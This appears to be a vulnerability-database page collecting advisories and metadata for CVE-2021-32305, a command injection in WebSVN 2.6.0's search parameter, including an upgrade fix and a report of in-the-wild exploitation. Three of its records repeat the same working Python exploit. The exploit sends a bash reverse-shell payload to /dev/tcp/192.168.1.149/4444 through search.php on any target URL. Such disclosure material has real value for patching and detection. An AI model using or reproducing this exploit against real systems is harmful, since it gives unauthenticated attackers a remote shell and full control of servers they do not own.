Websvn 2.6.0 Remote Code Execution

2021-06-22T00:00:00

Description

{"id": "PACKETSTORM:163225", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Websvn 2.6.0 Remote Code Execution", "description": "", "published": "2021-06-22T00:00:00", "modified": "2021-06-22T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html", "reporter": "g0ldm45k", "references": [], "cvelist": ["CVE-2021-32305"], "immutableFields": [], "lastseen": "2021-06-22T19:44:51", "viewCount": 157, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-202105-16"]}, {"type": "attackerkb", "idList": ["AKB:D0A75ABF-92A4-40B6-AC30-229605E2A65C"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0531"]}, {"type": "cve", "idList": ["CVE-2021-32305"]}, {"type": "exploitdb", "idList": ["EDB-ID:50042"]}, {"type": "saint", "idList": ["SAINT:28F20EF802A9084D073223D84C3F3756", "SAINT:7ADEA4548268178C9F381C4964285C6B", "SAINT:ACCF7BFB51925E0D4EB4A45E0C9E9167"]}, {"type": "zdt", "idList": ["1337DAY-ID-36453"]}], "rev": 4}, "score": {"value": 7.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "archlinux", "idList": ["ASA-202105-16"]}, {"type": "attackerkb", "idList": ["AKB:D0A75ABF-92A4-40B6-AC30-229605E2A65C"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0531"]}, {"type": "cve", "idList": ["CVE-2021-32305"]}, {"type": "exploitdb", "idList": ["EDB-ID:50042"]}, {"type": "saint", "idList": ["SAINT:28F20EF802A9084D073223D84C3F3756", "SAINT:ACCF7BFB51925E0D4EB4A45E0C9E9167"]}, {"type": "zdt", "idList": ["1337DAY-ID-36453"]}]}, "exploitation": null, "vulnersScore": 7.2}, "sourceHref": "https://packetstormsecurity.com/files/download/163225/websvn260-exec.txt", "sourceData": "`# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated) \n# Date: 20/06/2021 \n# Exploit Author: g0ldm45k \n# Vendor Homepage: https://websvnphp.github.io/ \n# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0 \n# Version: 2.6.0 \n# Tested on: Docker + Debian GNU/Linux (Buster) \n# CVE : CVE-2021-32305 \n \nimport requests \nimport argparse \nfrom urllib.parse import quote_plus \n \nPAYLOAD = \"/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'\" \nREQUEST_PAYLOAD = '/search.php?search=\";{};\"' \n \nparser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.') \nparser.add_argument('target', type=str, help=\"Target URL.\") \n \nargs = parser.parse_args() \n \nif args.target.startswith(\"http://\") or args.target.startswith(\"https://\"): \ntarget = args.target \nelse: \nprint(\"[!] Target should start with either http:// or https://\") \nexit() \n \nrequests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD))) \n \nprint(\"[*] Request send. Did you get what you wanted?\") \n \n`\n", "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645869111}}

{"saint": [{"lastseen": "2021-07-29T16:40:13", "description": "Added: 06/23/2021 \n\n\n### Background\n\n[WebSVN](<https://websvnphp.github.io/>) is a web interface for Subversion repositories. \n\n### Problem\n\nA command injection vulnerability allows remote unauthenticated attackers to execute arbitrary commands by sending a specially crafted search request. \n\n### Resolution\n\n[Upgrade](<https://github.com/websvnphp/websvn/releases>) to WebSVN 2.6.1 or higher. \n\n### References\n\n<https://www.cvedetails.com/cve/CVE-2021-32305/> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-23T00:00:00", "type": "saint", "title": "WebSVN search command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32305"], "modified": "2021-06-23T00:00:00", "id": "SAINT:28F20EF802A9084D073223D84C3F3756", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/websvn_search", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:42", "description": "Added: 06/23/2021 \n\n\n### Background\n\n[WebSVN](<https://websvnphp.github.io/>) is a web interface for Subversion repositories. \n\n### Problem\n\nA command injection vulnerability allows remote unauthenticated attackers to execute arbitrary commands by sending a specially crafted search request. \n\n### Resolution\n\n[Upgrade](<https://github.com/websvnphp/websvn/releases>) to WebSVN 2.6.1 or higher. \n\n### References\n\n<https://www.cvedetails.com/cve/CVE-2021-32305/> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-23T00:00:00", "type": "saint", "title": "WebSVN search command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32305"], "modified": "2021-06-23T00:00:00", "id": "SAINT:ACCF7BFB51925E0D4EB4A45E0C9E9167", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/websvn_search", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:31:57", "description": "Added: 06/23/2021 \n\n\n### Background\n\n[WebSVN](<https://websvnphp.github.io/>) is a web interface for Subversion repositories. \n\n### Problem\n\nA command injection vulnerability allows remote unauthenticated attackers to execute arbitrary commands by sending a specially crafted search request. \n\n### Resolution\n\n[Upgrade](<https://github.com/websvnphp/websvn/releases>) to WebSVN 2.6.1 or higher. \n\n### References\n\n<https://www.cvedetails.com/cve/CVE-2021-32305/> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-23T00:00:00", "type": "saint", "title": "WebSVN search command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32305"], "modified": "2021-06-23T00:00:00", "id": "SAINT:7ADEA4548268178C9F381C4964285C6B", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/websvn_search", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2021-07-28T14:33:54", "description": "Arch Linux Security Advisory ASA-202105-16\n==========================================\n\nSeverity: High\nDate : 2021-05-25\nCVE-ID : CVE-2021-32305\nPackage : websvn\nType : arbitrary command execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1969\n\nSummary\n=======\n\nThe package websvn before version 2.6.1-1 is vulnerable to arbitrary\ncommand execution.\n\nResolution\n==========\n\nUpgrade to 2.6.1-1.\n\n# pacman -Syu \"websvn>=2.6.1-1\"\n\nThe problem has been fixed upstream in version 2.6.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nWebSVN before 2.6.1 allows remote attackers to execute arbitrary\ncommands via shell metacharacters in the search parameter.\n\nImpact\n======\n\nA remote attacker can execute arbitrary shell commands on the server\nusing a crafted search query.\n\nReferences\n==========\n\nhttps://github.com/websvnphp/websvn/pull/142\nhttps://github.com/websvnphp/websvn/commit/88fce56b7b9dbfc0fe2629217c3bff2c2e751920\nhttps://security.archlinux.org/CVE-2021-32305", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-25T00:00:00", "type": "archlinux", "title": "[ASA-202105-16] websvn: arbitrary command execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32305"], "modified": "2021-05-25T00:00:00", "id": "ASA-202105-16", "href": "https://security.archlinux.org/ASA-202105-16", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:38:03", "description": "A remote code execution vulnerability exists in WebSVN. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-31T00:00:00", "type": "checkpoint_advisories", "title": "WebSVN Remote Code Execution (CVE-2021-32305)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32305"], "modified": "2021-08-31T00:00:00", "id": "CPAI-2021-0531", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-27T09:38:19", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-21T00:00:00", "type": "zdt", "title": "Websvn 2.6.0 - Remote Code Execution (Unauthenticated) Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32305"], "modified": "2021-06-21T00:00:00", "id": "1337DAY-ID-36453", "href": "https://0day.today/exploit/description/36453", "sourceData": "# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)\n# Exploit Author: g0ldm45k\n# Vendor Homepage: https://websvnphp.github.io/\n# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0\n# Version: 2.6.0\n# Tested on: Docker + Debian GNU/Linux (Buster)\n# CVE : CVE-2021-32305\n\nimport requests\nimport argparse\nfrom urllib.parse import quote_plus\n\nPAYLOAD = \"/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'\"\nREQUEST_PAYLOAD = '/search.php?search=\";{};\"'\n\nparser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')\nparser.add_argument('target', type=str, help=\"Target URL.\")\n\nargs = parser.parse_args()\n\nif args.target.startswith(\"http://\") or args.target.startswith(\"https://\"):\n target = args.target\nelse:\n print(\"[!] Target should start with either http:// or https://\")\n exit()\n\nrequests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))\n\nprint(\"[*] Request send. Did you get what you wanted?\")\n", "sourceHref": "https://0day.today/exploit/36453", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T18:22:02", "description": "WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-18T17:15:00", "type": "cve", "title": "CVE-2021-32305", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32305"], "modified": "2022-01-01T17:53:00", "cpe": [], "id": "CVE-2021-32305", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-32305", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}], "attackerkb": [{"lastseen": "2022-01-05T13:45:42", "description": "WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.\n\n \n**Recent assessments:** \n \n**NinjaOperator** at September 01, 2021 4:26pm UTC reported:\n\nUnknown actors are actively exploiting a disclosed command injection vulnerability affecting WebSVN, an open-source web application for browsing source. \nThe actors used a command injection to download a shell script that will infect the system with malware. \n<https://unit42.paloaltonetworks.com/cve-2021-32305-websvn/>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-18T00:00:00", "type": "attackerkb", "title": "CVE-2021-32305", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32305"], "modified": "2021-05-25T00:00:00", "id": "AKB:D0A75ABF-92A4-40B6-AC30-229605E2A65C", "href": "https://attackerkb.com/topics/cGlMtfhKlk/cve-2021-32305", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-05-13T17:37:07", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-21T00:00:00", "type": "exploitdb", "title": "Websvn 2.6.0 - Remote Code Execution (Unauthenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-32305", "CVE-2021-32305"], "modified": "2021-06-21T00:00:00", "id": "EDB-ID:50042", "href": "https://www.exploit-db.com/exploits/50042", "sourceData": "# Exploit Title: Websvn 2.6.0 - Remote Code Execution (Unauthenticated)\r\n# Date: 20/06/2021\r\n# Exploit Author: g0ldm45k\r\n# Vendor Homepage: https://websvnphp.github.io/\r\n# Software Link: https://github.com/websvnphp/websvn/releases/tag/2.6.0\r\n# Version: 2.6.0\r\n# Tested on: Docker + Debian GNU/Linux (Buster)\r\n# CVE : CVE-2021-32305\r\n\r\nimport requests\r\nimport argparse\r\nfrom urllib.parse import quote_plus\r\n\r\nPAYLOAD = \"/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.149/4444 0>&1'\"\r\nREQUEST_PAYLOAD = '/search.php?search=\";{};\"'\r\n\r\nparser = argparse.ArgumentParser(description='Send a payload to a websvn 2.6.0 server.')\r\nparser.add_argument('target', type=str, help=\"Target URL.\")\r\n\r\nargs = parser.parse_args()\r\n\r\nif args.target.startswith(\"http://\") or args.target.startswith(\"https://\"):\r\n target = args.target\r\nelse:\r\n print(\"[!] Target should start with either http:// or https://\")\r\n exit()\r\n\r\nrequests.get(target + REQUEST_PAYLOAD.format(quote_plus(PAYLOAD)))\r\n\r\nprint(\"[*] Request send. Did you get what you wanted?\")", "sourceHref": "https://www.exploit-db.com/download/50042", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

Websvn 2.6.0 Remote Code Execution

Description

Related